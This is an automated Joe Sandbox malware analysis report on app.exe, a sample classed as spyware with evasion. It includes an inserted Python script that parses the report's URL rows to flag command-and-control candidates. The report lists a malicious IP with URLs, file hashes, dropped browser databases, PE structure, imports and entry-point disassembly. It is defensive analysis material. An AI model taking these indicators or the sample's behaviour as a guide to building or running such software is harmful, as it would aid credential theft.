                                                                                                                                      http://144.208.127.230Uapp.exe, 00000003.00000002.3294569055.00000000008CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      low
                                                                                                                                      https://secure.eicar.org/eicar.com.txtapp.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.autoitscript.com/site/autoit/downloads/7app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
IP: 144.208.127.230
  Domain: unknown
  Country: United States
  ASN: 395092 (SHOCK-1US)
  Malicious: true
IP: 172.67.74.152
  Domain: api.ipify.org
  Country: United States
  ASN: 13335 (CLOUDFLARENETUS)
  Malicious: false
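In the flattened URL rows the URL, the memory-dump source and the Malicious flag run together into one string, which makes it easy to miss that seven of the rows point at 144.208.127.230, the only host the IP table above marks malicious, while the per-URL verdicts ("Avira URL Cloud: safe", Virustotal 0%) all say nothing is wrong. Most of the other URLs (EICAR download pages, Office setup and sign-in, AutoIt downloads, Ecosia and Google favicons) are the kind of strings a browser-history harvest leaves in process memory, consistent with the browser-information signature in this report. The following is an added example of triaging such rows, written for this page and not Joe Sandbox code: it parses six rows copied from the report above into records and lists every URL whose host is an IP the report flags. The parsing rules are assumptions about how the extracted text fuses the Name, Source and Malicious columns; the memory-dump names are kept as opaque strings and their fields are not decoded.

```python
"""Parse the flattened URL rows and the IP table of a Joe Sandbox report into
IOC records and list the URLs that point at a host the report marks malicious.

Added example for this page, not Joe Sandbox code. The rows below are copied
from the report (constructed input); the parsing rules are assumptions about
how the extracted text fuses the Name, Source and Malicious columns.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Six URL rows as they appear in the flattened report: URL, memory-dump source
# list and the Malicious flag fused on one line, then detection bullets and
# the reputation on their own lines.
URL_ROWS = """\
https://POSTHTTP/1.1Content-Type:app.exe, 00000003.00000002.3295913444.0000000002530000.00000040.00001000.00020000.00000000.sdmpfalse
• Avira URL Cloud: safe
low
http://144.208.127.230/e&app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
• Avira URL Cloud: safe
unknown
https://secure.eicar.org/eicar.com.txt/app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmpfalse
high
https://alldrivers4devices.netapp.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpfalse
• 1%, Virustotal, Browse
• Avira URL Cloud: safe
unknown
http://144.208.127.230:80/oapp.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132299964.0000000005586000.00000004.00000020.00020000.00000000.sdmpfalse
• Avira URL Cloud: safe
unknown
http://144.208.127.230Uapp.exe, 00000003.00000002.3294569055.00000000008CF000.00000004.00000020.00020000.00000000.sdmpfalse
• Avira URL Cloud: safe
low
"""

# IP table rows from the report: (ip, domain, asn, asn name, malicious).
IP_ROWS = [
    ("144.208.127.230", "unknown", 395092, "SHOCK-1US", True),
    ("172.67.74.152", "api.ipify.org", 13335, "CLOUDFLARENETUS", False),
]

# One memory-dump source: the process name, then dotted hex fields ending in
# .sdmp. The meaning of the individual fields is not decoded here.
_DUMP = r"[0-9A-F.]+\.sdmp"
_SOURCE = rf"app\.exe, {_DUMP}"
_ROW = re.compile(rf"^(?P<url>https?://.+?)(?P<sources>{_SOURCE}(?:, {_SOURCE})*)(?P<malicious>true|false)$")
_IPV4 = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})")


def _host(url):
    """Host part of a URL; trailing junk after an IPv4 literal (e.g. '230U') is dropped."""
    netloc = urlsplit(url).netloc
    m = _IPV4.match(netloc)
    return m.group(1) if m else netloc.split(":")[0].lower()


def parse_url_rows(text):
    """Turn the flattened rows into dicts: url, host, sources, malicious, detections, reputation."""
    rows = []
    for line in text.splitlines():
        m = _ROW.match(line)
        if m:
            rows.append({
                "url": m["url"],
                "host": _host(m["url"]),
                "sources": re.findall(_DUMP, m["sources"]),
                "malicious": m["malicious"] == "true",
                "detections": [],
                "reputation": None,
            })
        elif line.startswith("• ") and rows:
            # "Browse" is the report's link to the vendor page, not part of the verdict.
            rows[-1]["detections"].append(line[2:].removesuffix(", Browse"))
        elif line in ("low", "high", "unknown") and rows:
            rows[-1]["reputation"] = line
    return rows


def triage(url_rows, ip_rows):
    """URLs whose host is an IP the report flags, plus a per-host row count."""
    flagged = {ip for ip, _domain, _asn, _name, malicious in ip_rows if malicious}
    per_host = defaultdict(int)
    for r in url_rows:
        per_host[r["host"]] += 1
    return {
        "c2_candidates": sorted(r["url"] for r in url_rows if r["host"] in flagged),
        "per_host": dict(per_host),
    }


if __name__ == "__main__":
    rows = parse_url_rows(URL_ROWS)
    result = triage(rows, IP_ROWS)
    for url in result["c2_candidates"]:
        print("flagged host:", url)
    print(result["per_host"])
```

Run on the six rows, `triage` returns the three 144.208.127.230 URLs as C2 candidates and a per-host count that shows that IP with more rows than any other host. The URL-reputation verdicts in the rows are lookups against the URL string, not a judgement about the sample, so they should not override the IP-level "Malicious: true"; the request template at https://POSTHTTP/1.1Content-Type: in the same process is a further hint that the sample builds HTTP POST requests itself.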
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1436386
Start date and time: 2024-05-05 00:21:26 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 57s
Hypervisor based Inspection enabled: false
Report type: light
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Run name: Suspected VM Detection
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: app.exe
Detection: MAL
Classification: mal100.spyw.evad.winEXE@10/6@1/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): WMIADAP.exe
• HTTP Packets have been reduced
• TCP Packets have been reduced to 100
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded the maximum time and may be missing disassembly code information.
• Report size exceeded the maximum capacity and may be missing disassembly code.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Time: 00:24:47
  Type: API Interceptor
  Description: 49x Sleep call for process: app.exe modified
No context
Process: C:\Users\user\Desktop\app.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1290240
Entropy (8bit): 7.441704402192102
Encrypted: false
SSDEEP: 24576:CIFxe+AY3rqYsavMOQdbac5IQH97wiI3dzAr09UDZ5YUD8:1xeSNR0vbac5/d8P3diDZ6q
MD5: 75B9EF9142A78671D449C8D22AB6BE14
SHA1: 0461F1C46644ACDE8020BB59B53B1E34B65977CA
SHA-256: E9BC44CF548A70E7285499209973FAF44B7374DECE1413DFCDC03BF25A6C599C
SHA-512: 14EF889F580C02E319B6D9D899DDBD1BD523C1D8B493EAB8B98DA6D3D276D76EFB9B5694759DF7D68BB9D002A8ACE8FC82D22121A7B4EA236D5F9CEF38CC809C
Malicious: true
Antivirus:
• Joe Sandbox ML, Detection: 100%
• ReversingLabs, Detection: 11%
• Virustotal, Detection: 11%
Reputation: low
Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........P(..>{..>{..>{?.c{..>{v..{..>{...{..>{f."{..>{e."{..>{F.'{..>{..?{..>{F.~{..>{F."{&.>{...{..>{..5{..>{..^{..>{F.#{.>{F.{{..>{F..{..>{Rich..>{................PE..L......P.............................]............@.......................... ..............................................$........................................................................................................................text...2........................... ....rdata...&.......0..................@..@.data........ ...@... ..............@....rsrc................`..............@..@)m&......P.......P...`.................@........................................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\app.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: false
Reputation: high, very likely benign file
Preview: [ZoneTransfer]....ZoneId=0
Process: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe
File Type: SQLite 3.x database, last written using SQLite version 3036000, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x9, schema 4, UTF-8, version-valid-for 10
Category: dropped
Size (bytes): 28672
Entropy (8bit): 1.5161495002712742
Encrypted: false
SSDEEP: 96:s3n5HGsht8kAM0hsYfxqYgXZBqIcsrl3tuY2sWsqF:c5mF5wnpx9uYSF
MD5: 16A6EDF5F48F2A7B20B3B8825384B05C
SHA1: A59542299A41166F515B18AB8CBC3D72517ED207
SHA-256: 3E1A2BB358B396C201A6058EC8A05E25B167255EB3DAEEB1130331A298CC6F93
SHA-512: 7C4C9D69B05EA5B120C0DB6DF7D0C4487387659AF6D17C387503CA360EF8430F676B0964B6BC3C368BA4DC8D0E648B2750C26970D833788982BBF5BC04AC632D
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe
File Type: SQLite 3.x database, last written using SQLite version 3036000, file counter 4, database pages 35, cookie 0x1e, schema 4, UTF-8, version-valid-for 4
Category: dropped
Size (bytes): 163840
Entropy (8bit): 0.44975538801868414
Encrypted: false
SSDEEP: 96:Ou1HAU+bDoYysX0uhnyZtha58VjN9DLjGQLBE3u:Ou1X+bDo3irhnyBi8Vj3XBBE3u
MD5: 89E4498D0328AFC71113CC75EBE7D770
SHA1: 120CF58C897FF1025F8B4F854A21821D948F74BC
SHA-256: F50B271AFE0D4950FAE539E4A04C3D07849F0CE2250E73B352CDB3D981095B40
SHA-512: 7914EDF9352FBB1ABB6A0B89A4F47F09DE5672DEB6B4BE9EBEA833C8D1ED3EFD5AD16A612DF3DF65C878EB577FD0B697BC44C3E52D9BBFB82A81C1C903621989
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe
File Type: SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 27, 1st free page 7, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 57344
Entropy (8bit): 0.7310370201569906
Encrypted: false
SSDEEP: 96:qsvKLyeymO9K3PlGNxotxPUCbn8MouON3n:q86PlGNxss27e
MD5: A802F475CA2D00B16F45FEA728F2247C
SHA1: AF57C02DA108CFA0D7323252126CC87D7B608786
SHA-256: 156ADDC0B949718CF518720E5774557B134CCF769A15E0413ABC257C80E58684
SHA-512: 275704B399A1C236C730F4702B57320BD7F034DC234B7A820452F8C650334233BD6830798446664F133BA4C77AA2F91E66E901CE8A11BD8575C2CD08AB9BE98F
Malicious: false
Process: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe
File Type: SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 122880
Entropy (8bit): 1.1414673161713362
Encrypted: false
SSDEEP: 192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
MD5: 24937DB267D854F3EF5453E2E54EA21B
SHA1: F519A77A669D9F706D5D537A203B7245368D40CE
SHA-256: 369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
SHA-512: AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
Malicious: false
File type: PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit): 7.441704402192102
TrID:
• Win32 Executable (generic) a (10002005/4) 99.83%
• Windows Screen Saver (13104/52) 0.13%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: app.exe
File size: 1'290'240 bytes
MD5: 75b9ef9142a78671d449c8d22ab6be14
SHA1: 0461f1c46644acde8020bb59b53b1e34b65977ca
SHA256: e9bc44cf548a70e7285499209973faf44b7374dece1413dfcdc03bf25a6c599c
SHA512: 14ef889f580c02e319b6d9d899ddbd1bd523c1d8b493eab8b98da6d3d276d76efb9b5694759df7d68bb9d002a8ace8fc82d22121a7b4ea236d5f9cef38cc809c
SSDEEP: 24576:CIFxe+AY3rqYsavMOQdbac5IQH97wiI3dzAr09UDZ5YUD8:1xeSNR0vbac5/d8P3diDZ6q
TLSH: 8255CF05F3D2B8B1D15192772DC96161B6ED993048D83F0732D0EE5E1B3B9A6B40FE2A
Icon Hash: 0f4ecda7ae5d1715
Entrypoint: 0x415dde
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows cui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp: 0x500F9507 [Wed Jul 25 06:41:11 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 26600adf486f72b556f917a64c8fd23f
Instruction
push 00000060h
push 0043A478h
call 00007F8C48B70DE3h
mov edi, 00000094h
mov eax, edi
call 00007F8C48B6F33Fh
mov dword ptr [ebp-18h], esp
mov esi, esp
mov dword ptr [esi], edi
push esi
call dword ptr [0042F2B4h]
mov ecx, dword ptr [esi+10h]
mov dword ptr [0044B190h], ecx
mov eax, dword ptr [esi+04h]
mov dword ptr [0044B19Ch], eax
mov edx, dword ptr [esi+08h]
mov dword ptr [0044B1A0h], edx
mov esi, dword ptr [esi+0Ch]
and esi, 00007FFFh
mov dword ptr [0044B194h], esi
cmp ecx, 02h
je 00007F8C48B6FCDEh
or esi, 00008000h
mov dword ptr [0044B194h], esi
shl eax, 08h
add eax, edx
mov dword ptr [0044B198h], eax
xor esi, esi
push esi
mov edi, dword ptr [0042F20Ch]
call edi
cmp word ptr [eax], 5A4Dh
jne 00007F8C48B6FCF1h
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
cmp dword ptr [ecx], 00004550h
jne 00007F8C48B6FCE4h
movzx eax, word ptr [ecx+18h]
cmp eax, 0000010Bh
je 00007F8C48B6FCF1h
cmp eax, 0000020Bh
je 00007F8C48B6FCD7h
mov dword ptr [ebp-1Ch], esi
jmp 00007F8C48B6FCF9h
cmp dword ptr [ecx+00000084h], 0Eh
jbe 00007F8C48B6FCC4h
xor eax, eax
cmp dword ptr [ecx+000000F8h], esi
jmp 00007F8C48B6FCE0h
cmp dword ptr [ecx+74h], 0Eh
jbe 00007F8C48B6FCB4h
xor eax, eax
cmp dword ptr [ecx+000000E8h], esi
setne al
mov dword ptr [ebp-1Ch], eax
Programming Language:
• [ASM] VS2002 (.NET) build 9466
• [ C ] VS2002 (.NET) build 9466
• [C++] VS2003 (.NET) build 3077
• [C++] VS2002 (.NET) build 9466
• [RES] VS2002 (.NET) build 9466
• [LNK] VS2002 (.NET) build 9466
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3f924 | 0x118 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4d000 | 0x2f5f0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2f000 | 0x594 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2db32 | 0x2e000 | 7868e2f41e5b3ab908ac5a72a66f5953 | False | 0.6095076851222826 | data | 6.670624963209676 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x2f000 | 0x126c6 | 0x13000 | efd458d4cde7206fd4c5482997a30ba9 | False | 0.4482421875 | data | 5.736665908168061 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x42000 | 0xa9f4 | 0x4000 | 07b79e131c84ddfb0842641915843ec1 | False | 0.4459228515625 | data | 5.072911159589167 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4d000 | 0x2f5f0 | 0x30000 | 2686df77c23e2ca3144ababd1a5e1501 | False | 0.2823994954427083 | data | 4.484521144858898 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
)m& | 0x7d000 | 0xc5000 | 0xc5000 | acab40631ef6f655b384348be6aac2b9 | False | 0.841724996034264 | data | 7.775469163423906 | IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
JPG | 0x4f2b0 | 0x2b1e6 | PC bitmap, Windows 3.x format, 635 x 276 x 8, cbSize 176614, bits offset 1078 | Chinese | China | 0.27774128891254374
RT_CURSOR | 0x7a498 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | Chinese | China | 0.4805194805194805
RT_CURSOR | 0x7a5d0 | 0xb4 | Targa image data - Map 32 x 65536 x 1 +16 "\001" | Chinese | China | 0.7
RT_CURSOR | 0x7a6b0 | 0x134 | AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd | Chinese | China | 0.36363636363636365
RT_CURSOR | 0x7a800 | 0x134 | Targa image data - RLE 64 x 65536 x 1 +32 "\001" | Chinese | China | 0.35714285714285715
RT_CURSOR | 0x7a950 | 0x134 | data | Chinese | China | 0.37337662337662336
RT_CURSOR | 0x7aaa0 | 0x134 | data | Chinese | China | 0.37662337662337664
RT_CURSOR | 0x7abf0 | 0x134 | Targa image data 64 x 65536 x 1 +32 "\001" | Chinese | China | 0.36688311688311687
RT_CURSOR | 0x7ad40 | 0x134 | Targa image data 64 x 65536 x 1 +32 "\001" | Chinese | China | 0.37662337662337664
RT_CURSOR | 0x7ae90 | 0x134 | Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001" | Chinese | China | 0.36688311688311687
RT_CURSOR | 0x7afe0 | 0x134 | Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001" | Chinese | China | 0.38636363636363635
RT_CURSOR | 0x7b130 | 0x134 | data | Chinese | China | 0.44155844155844154
RT_CURSOR | 0x7b280 | 0x134 | data | Chinese | China | 0.4155844155844156
RT_CURSOR | 0x7b3d0 | 0x134 | AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd | Chinese | China | 0.5422077922077922
RT_CURSOR | 0x7b520 | 0x134 | data | Chinese | China | 0.2662337662337662
RT_CURSOR | 0x7b670 | 0x134 | data | Chinese | China | 0.2824675324675325
RT_CURSOR | 0x7b7c0 | 0x134 | data | Chinese | China | 0.3246753246753247
RT_BITMAP | 0x7b9f8 | 0xb8 | Device independent bitmap graphic, 12 x 10 x 4, image size 80 | Chinese | China | 0.44565217391304346
RT_BITMAP | 0x7bab0 | 0x144 | Device independent bitmap graphic, 33 x 11 x 4, image size 220 | Chinese | China | 0.37962962962962965
RT_ICON | 0x4db70 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Chinese | China | 0.6042418772563177
RT_ICON | 0x4e430 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Chinese | China | 0.6042418772563177
RT_DIALOG | 0x4ecf0 | 0x23e | data | Chinese | China | 0.5174216027874564
RT_DIALOG | 0x4ef30 | 0x94 | data | Chinese | China | 0.6959459459459459
RT_DIALOG | 0x7b910 | 0xe2 | data | Chinese | China | 0.6637168141592921
RT_STRING | 0x7bbf8 | 0x46 | data | Chinese | China | 0.6857142857142857
RT_STRING | 0x7bc40 | 0x54 | data | Chinese | China | 0.8571428571428571
RT_STRING | 0x7bc98 | 0x2c | data | Chinese | China | 0.5909090909090909
RT_STRING | 0x7bcc8 | 0x74 | data | Chinese | China | 0.8448275862068966
RT_STRING | 0x7bd40 | 0x1d0 | data | Chinese | China | 0.8060344827586207
RT_STRING | 0x7c088 | 0x164 | data | Chinese | China | 0.48314606741573035
RT_STRING | 0x7bf50 | 0x132 | data | Chinese | China | 0.6405228758169934
RT_STRING | 0x7c570 | 0x50 | data | Chinese | China | 0.725
RT_STRING | 0x7bf10 | 0x40 | data | Chinese | China | 0.65625
RT_STRING | 0x7c4d8 | 0x6a | data | Chinese | China | 0.7452830188679245
RT_STRING | 0x7c1f0 | 0x1d6 | data | Chinese | China | 0.6723404255319149
RT_STRING | 0x7c3c8 | 0x110 | data | Chinese | China | 0.625
RT_STRING | 0x7c548 | 0x24 | data | Chinese | China | 0.4444444444444444
RT_STRING | 0x7c5c0 | 0x30 | data | Chinese | China | 0.625
RT_GROUP_CURSOR | 0x7a688 | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | Chinese | China | 1.0294117647058822
RT_GROUP_CURSOR | 0x7ae78 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_CURSOR | 0x7a7e8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_CURSOR | 0x7ad28 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_CURSOR | 0x7abd8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_CURSOR | 0x7b508 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_CURSOR | 0x7aa88 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_CURSOR | 0x7b118 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_CURSOR | 0x7a938 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_CURSOR | 0x7afc8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_CURSOR | 0x7b268 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_CURSOR | 0x7b3b8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_CURSOR | 0x7b658 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_CURSOR | 0x7b7a8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_CURSOR | 0x7b8f8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_ICON | 0x4e418 | 0x14 | data | Chinese | China | 1.15
RT_GROUP_ICON | 0x4ecd8 | 0x14 | data | Chinese | China | 1.25
RT_VERSION | 0x4efc8 | 0x2e8 | data | Chinese | China | 0.5631720430107527
DLL | Import
KERNEL32.dll | LockFile, UnlockFile, SetEndOfFile, DuplicateHandle, FindClose, FindFirstFileA, GetFullPathNameA, GetCPInfo, GetOEMCP, FileTimeToSystemTime, SetErrorMode, FileTimeToLocalFileTime, GetFileAttributesA, GetFileTime, GetTickCount, HeapAlloc, HeapFree, RtlUnwind, GetStartupInfoA, GetCommandLineA, RaiseException, GetSystemTimeAsFileTime, ExitProcess, TerminateProcess, HeapReAlloc, HeapSize, FlushFileBuffers, HeapCreate, VirtualFree, VirtualAlloc, IsBadWritePtr, GetStdHandle, UnhandledExceptionFilter, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, SetUnhandledExceptionFilter, GetStringTypeA, GetStringTypeW, GetCurrentProcessId, LCMapStringA, LCMapStringW, GetTimeZoneInformation, IsBadReadPtr, IsBadCodePtr, VirtualProtect, GetSystemInfo, VirtualQuery, SetStdHandle, SetEnvironmentVariableA, SetFilePointer, GlobalFlags, WritePrivateProfileStringA, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, TlsAlloc, InitializeCriticalSection, TlsGetValue, EnterCriticalSection, GlobalHandle, GlobalReAlloc, LeaveCriticalSection, LocalAlloc, GlobalGetAtomNameA, GlobalFindAtomA, lstrcatA, lstrcmpW, GlobalAddAtomA, GetCurrentThread, GetCurrentThreadId, GlobalDeleteAtom, lstrcmpA, ConvertDefaultLocale, EnumResourceLanguagesA, lstrcpyA, SetLastError, GlobalFree, MulDiv, GlobalAlloc, GlobalLock, GlobalUnlock, GetModuleHandleA, GetProcAddress, FormatMessageA, LocalFree, CopyFileA, GetCurrentDirectoryA, FreeResource, OpenFile, GetCurrentProcess, SetPriorityClass, lstrcpynA, DeviceIoControl, ReadFile, GetFileSize, GetLastError, QueryPerformanceCounter, QueryPerformanceFrequency, GetSystemDirectoryA, CreateFileA, WriteFile, CloseHandle, DeleteFileA, GetModuleFileNameA, LoadLibraryA, FreeLibrary, GetVolumeInformationA, OutputDebugStringA, DebugBreak, InterlockedIncrement, InterlockedDecrement, FindResourceA, LoadResource, LockResource, SizeofResource, lstrlenA, lstrcmpiA, CompareStringW, lstrlenW, CompareStringA, GetVersion, WideCharToMultiByte, MultiByteToWideChar, GetVersionExA, GetThreadLocale, GetLocaleInfoA, GetACP, HeapDestroy, InterlockedExchange
USER32.dll | InvalidateRgn, SetCapture, ReleaseCapture, GetNextDlgGroupItem, MessageBeep, RegisterClipboardFormatA, PostThreadMessageA, GetForegroundWindow, GetTopWindow, UnhookWindowsHookEx, GetMessagePos, MapWindowPoints, SetForegroundWindow, UpdateWindow, GetMenu, GetSysColor, AdjustWindowRectEx, EqualRect, GetClassInfoA, RegisterClassA, UnregisterClassA, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, SetWindowLongA, OffsetRect, IntersectRect, SystemParametersInfoA, GetWindowPlacement, GetWindowRect, CopyRect, PtInRect, GetWindow, SetWindowContextHelpId, MapDialogRect, SetWindowPos, GetDesktopWindow, SetActiveWindow, EndPaint, DestroyWindow, IsWindow, InvalidateRect, GetNextDlgTabItem, EndDialog, SetMenuItemBitmaps, GetFocus, ModifyMenuA, EnableMenuItem, CheckMenuItem, GetMenuCheckMarkDimensions, LoadBitmapA, SetWindowsHookExA, CallNextHookEx, GetMessageA, TranslateMessage, DispatchMessageA, GetActiveWindow, IsWindowVisible, GetKeyState, PeekMessageA, GetCursorPos, ValidateRect, GetParent, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, SetCursor, PostMessageA, PostQuitMessage, wsprintfA, GetMenuState, GetMenuItemID, GetMenuItemCount, CharLowerA, CharUpperA, BeginPaint, GetWindowDC, ReleaseDC, GetDC, ClientToScreen, GetSubMenu, MessageBoxA, CharNextA, wvsprintfA, GetSystemMetrics, LoadIconA, EnableWindow, 